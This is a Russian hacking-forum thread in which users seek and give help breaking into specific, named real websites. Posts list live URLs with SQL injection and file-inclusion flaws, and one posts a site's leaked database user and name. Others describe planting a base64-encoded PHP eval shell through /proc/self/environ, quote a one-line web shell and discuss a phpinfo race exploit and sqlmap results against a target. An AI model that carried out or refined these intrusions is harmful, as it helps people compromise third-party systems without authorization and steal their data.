Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. +
    Предыдущая тема там -> http://forum.antichat.ru/threads/46016/



    В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму).

    Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы, если вы хотите поделиться уязвимостью или нашли что-то новое и интересное в публичном двиге и хотите, чтобы вам помогли это разобрать.

    Задавать вопросы, ответы на которые с легкостью можно найти в многочисленных мануалах и статьях, вести личную переписку крайне не рекомендуется.

    Задавайте полный, четкий и внятный вопрос, который включает в себя описание найденной вами уязвимости, методы и способы, с помощью которых вы пытались ее проэксплуатировать, какие преграды при этом встретили.

    ЛОГИНЫ И ПАРОЛИ ПОСТИТЬ В ОТКРЫТОМ ВИДЕ ЗАПРЕЩЕНО
     
    #1 +, 27 Apr 2015
    Last edited by a moderator: 21 May 2015
    yarbabin and UXOR like this.
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Code:
    http://tn.tomsk.ru/tv/index.php?day=2015-04-05&dt=&ch=1140
    Можно что нибудь заинклудить тут? :)
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там не инкулд, там file_get_contents, а он читает содержимое файла в строку. но нет, прочитать тоже не выйдет, потому что у нас префикс в виде
    Code:
    http://tv.mail.ru/print_p.html
     
    _________________________
    Br@!ns likes this.
  4. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Code:
    http://compassrecords.com/cart.php?action=add&id=4537%27
    Помогите с выводом раскрутить
     
  5. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23

    5.5.42-cll:compass_usrweb@localhost:compass_compass09:Linux
     
    Br@!ns likes this.
  6. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Парни, есть LFI на сайте, который позволяет читать /proc/self/environ
    Ставлю в User-Agent простейший php код -сайт отдает 400 ошибку.
    Что сделать можно?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    через еррор_лог или ацес_лог пробовали?
     
    _________________________
  8. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    /proc/self/environ
    Через логи не пробовал.
    Проканало когда я закодировал в base64 и отдал код как куки - енвайров их тоже читает
    получилось что то типа eval(base64_decode($shell_str))
    Нельзя как то по эстетичнее?
     
    ex3mushka likes this.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    а зачем вам эстетика? лейте полноценный шелл и все. этот вариант тоже вполне эстетичный. не все сводится к <?eval($_POST[a]);?>
     
    _________________________
    Mister_Bert0ni likes this.
  10. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    tvnetcitoyenne.com/journal.php?article=Тут_Инклуд_Проходит&phpsessid=98e322270e7ed6ec12ff0d0e9b66cf2a
    Я не пойму как он фильтрует Юзер-Агент
     
  11. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    не проходит даже <?php echo 1;?>
     
  12. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Отлично, а как теперь можете ссылку скинуть?)
     
  13. AndreyBerkut

    AndreyBerkut New Member

    Joined:
    16 Dec 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    http://store.1001host.ru/get/25'/3238264cd17791854de5
    Кто подскажет, как раскрутить? Всё перепробовал... Готов заплатить за помощь.
     
  14. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    А вы уверены что там есть инъекция?
     
  15. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
  16. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    faza02, ты мне скидывал сплойт
    https://rdot.org/forum/showpost.php?p=18024&postcount=11
    Я разобрал заголовки и у меня получился файл на 40 мб.
    https://www.sendspace.com/file/7vxeod
    Не пойму где передается имя временного файла.
    Ответ сервера всегда одинаковый:
    То есть нигде имя временного файла не передается. Что не так?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    имя
    имя временного файла в есть в phpinfo();
    вот строка из сплоента:
    Code:
    if ($line =~ m#tmp_name].+(/tmp/php.+)$#) {
     
    _________________________
  18. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Пробовал тут:
    https://autopaymentfinder.com/phpinfo.php
    И на тестовом сайте денвера файл с phpinfo.
    Тоже-самое
     
  19. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Ребят подскажите пожалуйста

    Расковырял скулю ,меп выдает

    [16:45:55] [INFO] the back-end DBMS is Microsoft SQL Server
    web application technology: ColdFusion
    back-end DBMS: Microsoft SQL Server 2008

    И находит 20+ бд

    При этом ,при запросе таблиц от туда ,выходит месага

    [16:46:42] [WARNING] the SQL query provided does not return any output
    [16:46:43] [WARNING] the SQL query provided does not return any output
    [16:46:44] [WARNING] the SQL query provided does not return any output
    [16:46:45] [WARNING] the SQL query provided does not return any output
    [16:46:46] [WARNING] the SQL query provided does not return any output
    [16:46:47] [WARNING] the SQL query provided does not return any output

    Тобишь ,ни одну бд он не открыл .

    Есть способы обхода ?
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    какие пути обхода? обход чего? кто должен угадывать, почему нет вывода?
    пишите сюда запросы, ошибки и все, что может пригодится для того, чтобы не угадывать, в чем у вас проблема
     
    _________________________
    Chris likes this.